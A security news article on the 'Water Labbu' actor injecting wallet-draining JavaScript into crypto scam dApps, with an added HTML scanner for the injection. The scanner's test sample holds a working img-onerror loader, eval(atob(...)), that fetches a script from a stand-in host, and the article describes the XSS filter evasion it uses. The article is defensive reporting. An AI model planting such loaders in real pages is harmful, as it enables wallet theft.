Hackers compromise scam sites to redirect crypto transactions
According to Trend Micro researchers, a threat actor tracked as ‘Water Labbu’ is hacking into cryptocurrency scam sites and injecting malicious JavaScript in order to steal money from the victims those sites are scamming.
Some background: legitimate ‘dApps’ (decentralized applications) are used for liquidity mining, in which investors lend their cryptocurrency to a decentralized exchange in return for high yields funded by trading fees.
Fraudsters, however, have built scam versions of these ‘dApps’ that impersonate cryptocurrency liquidity mining services in order to steal victims’ cryptocurrency investments.
As soon as an investor connects their wallet to the dApp, Water Labbu’s script checks whether the wallet holds a large amount of cryptocurrency and, if so, tries to steal it using several methods.
Water Labbu is said to have already made at least $316,728 in profit from nine identified victims, and to have compromised at least 45 fraudulent websites.
To compromise the scam sites, the threat actor locates cryptocurrency scam sites and injects their “dApps” with malicious scripts that blend in easily with the site’s own code.
“In one of the cases we analyzed, Water Labbu injected an IMG tag to load a Base64-encoded JavaScript payload using the “onerror” event, in what is known as an XSS evasion technique to bypass Cross-Site Scripting (XSS) filters. The injected payload then generates another script element that loads another script from the delivery server tmpmeta[.]com,” Trend Micro explained in its report.
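The injection pattern described in that quote (an IMG tag whose onerror handler decodes a Base64 payload that in turn appends a remote script element) is something a site owner or responder can scan page source for. The following detector is an added example written for this article, not Trend Micro’s or the attacker’s code; the sample HTML and the delivery-server hostname in it are constructed placeholders.

```javascript
// Added example: flag <img onerror=...> handlers that decode a Base64 payload
// and use it to load a second-stage script, as described in the article.

// Pull the onerror handler body out of every <img> tag in an HTML document.
function extractImgOnerrorHandlers(html) {
  const imgTag = /<img\b[^>]*\bonerror\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  const handlers = [];
  let m;
  while ((m = imgTag.exec(html)) !== null) {
    handlers.push(m[1] ?? m[2] ?? m[3]);
  }
  return handlers;
}

// Decode every Base64 literal passed to atob() inside a handler.
function decodeAtobArguments(handler) {
  const atobCall = /atob\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)/g;
  const decoded = [];
  let m;
  while ((m = atobCall.exec(handler)) !== null) {
    decoded.push(Buffer.from(m[1], 'base64').toString('utf8'));
  }
  return decoded;
}

// A decoded payload is a loader if it creates a <script> element and points it
// at an absolute http(s) URL, i.e. a second stage fetched from another host.
const LOADER_PATTERNS = [/createElement\(\s*["']script["']\s*\)/i, /\.src\s*=\s*["']https?:\/\//i];

// Return one finding per suspicious handler; benign onerror handlers are ignored.
function scanHtml(html) {
  const findings = [];
  for (const handler of extractImgOnerrorHandlers(html)) {
    const decoded = decodeAtobArguments(handler);
    const evaluates = /\beval\(|\bFunction\(/.test(handler);
    const loadsRemoteScript = decoded.some(p => LOADER_PATTERNS.every(re => re.test(p)));
    if (decoded.length > 0 && (evaluates || loadsRemoteScript)) {
      findings.push({ handler, decoded, loadsRemoteScript });
    }
  }
  return findings;
}

// Constructed sample: one ordinary image and one injected loader. The hostname
// is a placeholder, not the delivery server named in the article.
const LOADER_JS = "var s=document.createElement('script');s.src='https://delivery-server.example/a.js';document.body.appendChild(s);";
const SAMPLE_HTML = `<img src="/logo.png" alt="logo" onerror="this.style.display='none'">
<img src="x" onerror="eval(atob('${Buffer.from(LOADER_JS).toString('base64')}'))">`;

console.log(JSON.stringify(scanHtml(SAMPLE_HTML), null, 2));
```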
Once the balance is above 0.005 ETH or 22,000 USDT, Water Labbu treats the target as valid, and the script then determines whether the victim is using Windows or a mobile OS (Android or iOS). If the victim is on a mobile device, Water Labbu’s malicious script sends a transaction authorization request via the dApp website, making it look as if it came from the scam website.
If the victim approves the transaction, the malicious script drains the wallet’s available funds and sends them to an address controlled by Water Labbu.
The sources for this piece include an article in BleepingComputer.